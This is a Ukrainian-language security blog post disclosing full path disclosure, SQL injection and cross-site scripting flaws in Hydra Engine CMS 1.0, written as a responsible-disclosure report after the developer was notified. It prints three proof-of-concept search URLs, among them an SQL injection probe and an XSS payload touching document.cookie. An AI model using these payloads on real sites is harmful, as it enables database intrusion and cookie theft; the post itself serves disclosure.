Уразливості в Hydra Engine

19:46 30.01.2010

28.08.2009

Нещодавно, 26.08.2009, я знайшов Full path disclosure, SQL Injection та Cross-Site Scripting уразливості в системі Hydra Engine. Це українська CMS. Дані уразливості я виявив на одному сайті, де використовується даний движок. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

30.01.2010

Full path disclosure:

http://site/search/’/

SQL Injection:

http://site/search/'%20and%20version()%3E5--%20/

XSS:

http://site/search/'1%3Cbody%20onload=alert(document.cookie)%3E/

Дані уразливості виправлені. Але виправлені неякісно, тому всі три уразливості знову працюють при невеликій зміні коду. Про що я вже повідомив розробнику Hydra і він працює над їх виправленням.

Уразлива версія Hydra Engine 1.0.


2 відповідей на “Уразливості в Hydra Engine”

  1. Thanks каже:

    Спасибо.

  2. MustLive каже:

    Пожалуйста ;-) .

Leave a Reply

You must be logged in to post a comment.